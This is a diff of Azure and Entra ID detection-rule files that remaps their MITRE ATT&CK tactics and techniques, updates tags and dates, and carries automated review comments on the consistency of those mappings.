 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -114,34 +106,39 @@ event.dataset: "azure.graphactivitylogs"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1078.004"
 name = "Cloud Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/004/"
-
-
 [rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1528"
-name = "Steal Application Access Token"
-reference = "https://attack.mitre.org/techniques/T1528/"
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
 [rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
-
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = [
diff --git a/rules/integrations/azure/ml_azure_event_failures.toml b/rules/integrations/azure/ml_azure_event_failures.toml
index 273f46e76a5..e5dcf556327 100644
--- a/rules/integrations/azure/ml_azure_event_failures.toml
+++ b/rules/integrations/azure/ml_azure_event_failures.toml
@@ -4,7 +4,7 @@ integration = ["azure"]
 maturity = "production"
 min_stack_comments = "New job added"
 min_stack_version = "9.3.0"
-updated_date = "2025/12/08"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 50
@@ -79,14 +79,7 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs
 risk_score = 21
 rule_id = "1eb74889-18c5-4f78-8010-d8aceb7a9ef4"
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Data Source: Azure",
- "Data Source: Azure Activity Logs",
- "Rule Type: ML",
- "Rule Type: Machine Learning",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Discovery", "Tactic: Lateral Movement", "Tactic: Privilege Escalation", "Data Source: Azure", "Data Source: Azure Activity Logs", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"]
 type = "machine_learning"
 [[rule.threat]]
@@ -97,28 +90,18 @@ id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
-[[rule.threat.technique]]
-id = "T1526"
-name = "Cloud Service Discovery"
-reference = "https://attack.mitre.org/techniques/T1526/"
-
-[[rule.threat.technique]]
-id = "T1580"
-name = "Cloud Infrastructure Discovery"
-reference = "https://attack.mitre.org/techniques/T1580/"
-
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0008"
+name = "Lateral Movement"
+reference = "https://attack.mitre.org/tactics/TA0008/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 [rule.threat.tactic]
-id = "TA0008"
-name = "Lateral Movement"
-reference = "https://attack.mitre.org/tactics/TA0008/"
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/integrations/azure/ml_azure_rare_event_failures.toml b/rules/integrations/azure/ml_azure_rare_event_failures.toml
index 9e1182f57d9..a2eb55186b4 100644
--- a/rules/integrations/azure/ml_azure_rare_event_failures.toml
+++ b/rules/integrations/azure/ml_azure_rare_event_failures.toml
@@ -4,7 +4,7 @@ integration = ["azure"]
 maturity = "production"
 min_stack_comments = "New job added"
 min_stack_version = "9.3.0"
-updated_date = "2025/12/08"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 50
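Review bot: The Discovery entry keeps its `[rule.threat.tactic]` but loses both T1526 and T1580, so it becomes a tactic-only mapping like the Lateral Movement and Privilege Escalation entries below it. Both removed techniques are Discovery techniques in ATT&CK, so this does not read as a tactic/technique correlation fix; if the intent is to map ML rules at tactic level only, a sentence in the PR description would save the next reader from wondering, otherwise keeping them under Discovery looks harmless. The three `Tactic:` tags added in the preceding `tags` hunk match the three tactics that remain, and the swap of the Lateral Movement and Privilege Escalation blocks only changes their order to alphabetical.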
@@ -88,61 +88,3 @@ tags = [
 ]
 type = "machine_learning"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0007"
-name = "Discovery"
-reference = "https://attack.mitre.org/tactics/TA0007/"
-
-[[rule.threat.technique]]
-id = "T1526"
-name = "Cloud Service Discovery"
-reference = "https://attack.mitre.org/techniques/T1526/"
-
-[[rule.threat.technique]]
-id = "T1580"
-name = "Cloud Infrastructure Discovery"
-reference = "https://attack.mitre.org/techniques/T1580/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0008"
-name = "Lateral Movement"
-reference = "https://attack.mitre.org/tactics/TA0008/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0009"
-name = "Collection"
-reference = "https://attack.mitre.org/tactics/TA0009/"
-
diff --git a/rules/integrations/azure/ml_azure_rare_method_by_city.toml b/rules/integrations/azure/ml_azure_rare_method_by_city.toml
index 84f94ffc52b..f9a6f0637fe 100644
--- a/rules/integrations/azure/ml_azure_rare_method_by_city.toml
+++ b/rules/integrations/azure/ml_azure_rare_method_by_city.toml
@@ -4,7 +4,7 @@ integration = ["azure"]
 maturity = "production"
 min_stack_comments = "New job added"
 min_stack_version = "9.3.0"
-updated_date = "2025/12/08"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 50
@@ -80,24 +80,12 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs
 risk_score = 21
 rule_id = "ce08cdb8-e6cb-46bb-a7cc-16d17547323f"
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Data Source: Azure",
- "Data Source: Azure Activity Logs",
- "Rule Type: ML",
- "Rule Type: Machine Learning",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Azure Activity Logs", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"]
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
-
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
@@ -107,3 +95,8 @@ reference = "https://attack.mitre.org/techniques/T1078/"
 id = "T1078.004"
 name = "Cloud Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/004/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules/integrations/azure/ml_azure_rare_method_by_country.toml b/rules/integrations/azure/ml_azure_rare_method_by_country.toml
index bbaf6442692..82337ac08ee 100644
--- a/rules/integrations/azure/ml_azure_rare_method_by_country.toml
+++ b/rules/integrations/azure/ml_azure_rare_method_by_country.toml
@@ -4,7 +4,7 @@ integration = ["azure"]
 maturity = "production"
 min_stack_comments = "New job added"
 min_stack_version = "9.3.0"
-updated_date = "2025/12/08"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 50
@@ -79,24 +79,12 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs
 risk_score = 21
 rule_id = "76de17b9-af25-49a0-9378-02888b6bb3a2"
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Data Source: Azure",
- "Data Source: Azure Activity Logs",
- "Rule Type: ML",
- "Rule Type: Machine Learning",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Azure Activity Logs", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"]
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
-
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
@@ -106,3 +94,8 @@ reference = "https://attack.mitre.org/techniques/T1078/"
 id = "T1078.004"
 name = "Cloud Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/004/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules/integrations/azure/ml_azure_rare_method_by_user.toml b/rules/integrations/azure/ml_azure_rare_method_by_user.toml
index 2dd9dacbf77..2a492ccadcb 100644
--- a/rules/integrations/azure/ml_azure_rare_method_by_user.toml
+++ b/rules/integrations/azure/ml_azure_rare_method_by_user.toml
@@ -4,7 +4,7 @@ integration = ["azure"]
 maturity = "production"
 min_stack_comments = "New job added"
 min_stack_version = "9.3.0"
-updated_date = "2025/12/08"
+updated_date = "2026/03/23"
 [rule]
 anomaly_threshold = 75
@@ -78,24 +78,12 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs
 risk_score = 21
 rule_id = "81892f44-4946-4b27-95d3-1d8929b114a7"
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Data Source: Azure",
- "Data Source: Azure Activity Logs",
- "Rule Type: ML",
- "Rule Type: Machine Learning",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Azure Activity Logs", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"]
 type = "machine_learning"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
-
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
@@ -106,42 +94,25 @@ id = "T1078.004"
 name = "Cloud Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/004/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
 [rule.threat.tactic]
-id = "TA0008"
-name = "Lateral Movement"
-reference = "https://attack.mitre.org/tactics/TA0008/"
-
-[[rule.threat.technique]]
-id = "T1021"
-name = "Remote Services"
-reference = "https://attack.mitre.org/techniques/T1021/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1021.007"
-name = "Cloud Services"
-reference = "https://attack.mitre.org/techniques/T1021/007/"
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
 [rule.threat.tactic]
-id = "TA0010"
-name = "Exfiltration"
-reference = "https://attack.mitre.org/tactics/TA0010/"
-
-[[rule.threat.technique]]
-id = "T1041"
-name = "Exfiltration Over C2 Channel"
-reference = "https://attack.mitre.org/techniques/T1041/"
-
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules/integrations/azure/persistence_automation_account_created.toml b/rules/integrations/azure/persistence_automation_account_created.toml
index 222286c88de..829a5c592d2 100644
--- a/rules/integrations/azure/persistence_automation_account_created.toml
+++ b/rules/integrations/azure/persistence_automation_account_created.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/18"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -62,7 +62,7 @@ references = [
 risk_score = 21
 rule_id = "df26fd74-1baa-4479-b42e-48da84642330"
 severity = "low"
-tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Identity and Access Audit", "Tactic: Persistence", "Resources: Investigation Guide"]
+tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: Azure", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -73,26 +73,13 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-
+id = "T1578"
+name = "Modify Cloud Compute Infrastructure"
+reference = "https://attack.mitre.org/techniques/T1578/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/integrations/azure/persistence_automation_webhook_created.toml b/rules/integrations/azure/persistence_automation_webhook_created.toml
index 8329792a513..e92f77af499 100644
--- a/rules/integrations/azure/persistence_automation_webhook_created.toml
+++ b/rules/integrations/azure/persistence_automation_webhook_created.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/18"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
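Review bot: After this change the rule maps only Defense Evasion / T1578 and the `Tactic: Persistence` tag is dropped, yet the file keeps its `persistence_automation_account_created.toml` name; if the repository's filename prefix is meant to track the rule's primary tactic, the file should be renamed or a Persistence entry retained. T1578 is a Defense Evasion technique in ATT&CK, so the tactic/technique pairing is internally consistent, but whether creating an Automation account fits "Modify Cloud Compute Infrastructure" is a judgment call that deserves a sentence in the PR description. Note also that T1078 Valid Accounts, previously listed under both tactics, disappears from this rule entirely rather than being moved.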
@@ -79,6 +79,7 @@ event.dataset:azure.activitylogs and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" @@ -88,15 +89,3 @@ reference = "https://attack.mitre.org/techniques/T1546/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1608" -name = "Stage Capabilities" -reference = "https://attack.mitre.org/techniques/T1608/" - -[rule.threat.tactic] -id = "TA0042" -name = "Resource Development" -reference = "https://attack.mitre.org/tactics/TA0042/" diff --git a/rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml b/rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml index a89c1fcdf5d..91602b230ea 100644 --- a/rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml +++ b/rules/integrations/azure/persistence_entra_id_conditional_access_policy_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/01" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -70,16 +70,7 @@ references = [ risk_score = 47 rule_id = "bc48bba7-4a23-4232-b551-eca3ca1e3f20" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Audit Logs", - "Use Case: Identity and Access Audit", - "Use Case: Configuration Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Use Case: Configuration Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" 
@@ -92,6 +83,7 @@ event.dataset: "azure.auditlogs" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" @@ -102,12 +94,28 @@ id = "T1556.009" name = "Conditional Access Policies" reference = "https://attack.mitre.org/techniques/T1556/009/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.009" +name = "Conditional Access Policies" +reference = "https://attack.mitre.org/techniques/T1556/009/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.new_terms] field = "new_terms_fields" value = ["azure.auditlogs.properties.initiated_by.user.userPrincipalName"] diff --git a/rules/integrations/azure/persistence_entra_id_global_administrator_role_assigned.toml b/rules/integrations/azure/persistence_entra_id_global_administrator_role_assigned.toml index 94d21dfa04f..2c0d8ed1c85 100644 --- a/rules/integrations/azure/persistence_entra_id_global_administrator_role_assigned.toml +++ b/rules/integrations/azure/persistence_entra_id_global_administrator_role_assigned.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/06" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -60,16 +60,7 @@ references = [ risk_score = 73 rule_id = "04c5a96f-19c5-44fd-9571-a0b033f9086f" severity = "high" -tags = [ - "Domain: Cloud", - "Domain: Identity", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Audit Logs", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" -] +tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -83,19 +74,36 @@ event.dataset:azure.auditlogs and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml b/rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml index 5729fb8abc7..38ea5fab7ad 100644 --- a/rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml 
+++ b/rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/20" integration = ["azure"] maturity = "production" -updated_date = "2025/09/08" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,16 +62,7 @@ This rule identifies the deactivation of MFA for an Entra ID user account. This risk_score = 47 rule_id = "dafa3235-76dc-40e2-9f71-1773b96d24cf" severity = "medium" -tags = [ - "Domain: Cloud", - "Domain: Identity", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Audit Logs", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Persistence", -] +tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" 
@@ -86,19 +77,36 @@ event.dataset: "azure.auditlogs" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" + [[rule.threat.technique.subtechnique]] id = "T1556.006" name = "Multi-Factor Authentication" reference = "https://attack.mitre.org/techniques/T1556/006/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/integrations/azure/persistence_entra_id_pim_user_added_global_admin.toml b/rules/integrations/azure/persistence_entra_id_pim_user_added_global_admin.toml index 67622baed76..4cd9743fae9 100644 --- a/rules/integrations/azure/persistence_entra_id_pim_user_added_global_admin.toml +++ b/rules/integrations/azure/persistence_entra_id_pim_user_added_global_admin.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/24" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
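Review bot: The blank-line layout of the two threat blocks is inconsistent on the new side: the first block gains a `+` blank line between the T1556 technique and its T1556.006 subtechnique, while the added second block runs `reference = "https://attack.mitre.org/techniques/T1556/"` straight into `[[rule.threat.technique.subtechnique]]`. The hunk otherwise adds separating blank lines, so the second block should use the same spacing, with a blank line before `[[rule.threat.technique.subtechnique]]`. The same uneven spacing appears in the added lines of persistence_entra_id_tenant_domain_federation_via_audit_logs.toml and persistence_event_hub_created_or_updated.toml.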
@@ -69,7 +69,7 @@ references = [ risk_score = 73 rule_id = "ed9ecd27-e3e6-4fd9-8586-7754803f7fc8" severity = "high" -tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Identity and Access Audit", "Tactic: Persistence", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -84,18 +84,36 @@ event.dataset:azure.auditlogs and azure.auditlogs.properties.category:RoleManage [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml b/rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml index 421b38cec2b..68e733f883d 100644 --- a/rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml +++ b/rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/09/01" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -68,13 +68,7 @@ references = [ risk_score = 47 rule_id = "7882cebf-6cf1-4de3-9662-213aa13e8b80" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Persistence", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Azure", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -85,30 +79,26 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Update role se [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" 
diff --git a/rules/integrations/azure/persistence_entra_id_rt_to_prt_transition_from_user_device.toml b/rules/integrations/azure/persistence_entra_id_rt_to_prt_transition_from_user_device.toml index b1eac4dbf32..72b956b54e5 100644 --- a/rules/integrations/azure/persistence_entra_id_rt_to_prt_transition_from_user_device.toml +++ b/rules/integrations/azure/persistence_entra_id_rt_to_prt_transition_from_user_device.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/24" integration = ["azure"] maturity = "production" -updated_date = "2025/12/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -52,17 +52,7 @@ references = [ risk_score = 47 rule_id = "40e60816-5122-11f0-9caa-f661ea17fbcd" severity = "medium" -tags = [ - "Domain: Cloud", - "Domain: Identity", - "Use Case: Threat Detection", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Sign-In Logs", - "Tactic: Persistence", - "Tactic: Initial Access", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: Identity", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Sign-In Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -110,48 +100,28 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.005" name = "Device Registration" reference = "https://attack.mitre.org/techniques/T1098/005/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" - - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/integrations/azure/persistence_entra_id_service_principal_credentials_added.toml b/rules/integrations/azure/persistence_entra_id_service_principal_credentials_added.toml index 39ea903de00..99fc3c11e04 100644 --- a/rules/integrations/azure/persistence_entra_id_service_principal_credentials_added.toml +++ b/rules/integrations/azure/persistence_entra_id_service_principal_credentials_added.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/05" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] 
